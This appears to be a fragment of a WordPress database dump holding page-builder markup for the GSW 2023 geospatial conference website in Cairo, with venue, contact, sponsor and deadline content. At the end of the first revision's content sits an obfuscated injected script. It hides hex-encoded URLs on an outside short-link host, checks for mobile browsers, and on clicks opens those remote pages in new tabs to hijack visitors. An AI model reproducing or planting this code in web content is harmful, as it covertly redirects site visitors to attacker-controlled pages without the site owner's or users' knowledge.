size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1682772322645{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023,at the InterContinental Cairo Semiramis,Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3287|url^https://gsw2023.com/wp-content/uploads/2022/11/intercontinental-cairo-7836282477-2x1-1.jpg|caption^null|alt^null|title^intercontinental-cairo-7836282477-2x1|description^null\" animation_direction=\"top-animation\"][vc_column][ultimate_heading main_heading=\"BOOK YOU HOTEL NOW\" main_heading_color=\"#8224e3\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\" margin_design_tab_text=\"\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #000080;\"><strong><a style=\"color: #000080;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Conference Venue Special Rate Booking is Opened Now</a></strong></span></h4>\n<p>[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fgsw2023-venue%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684296853410{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\">\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-05-17 04:21:42','2023-05-17 04:21:42','',3066,'https://gsw2023.com/?p=4508',0,'revision','',0),
(4509,1,'2023-05-17 04:23:19','2023-05-17 04:23:19','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684201412150{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684272005765{margin-top: -25px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"300\" height=\"124\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):            .</strong></p>\n<p><strong><del>April 15, 2023</del> ,</strong></p>\n<p><strong> May 15, 2023  (hard deadline, no extension)</strong><br />\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification:</strong></p>\n<p><strong><del>May 15, 2023</del>, May 21, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button 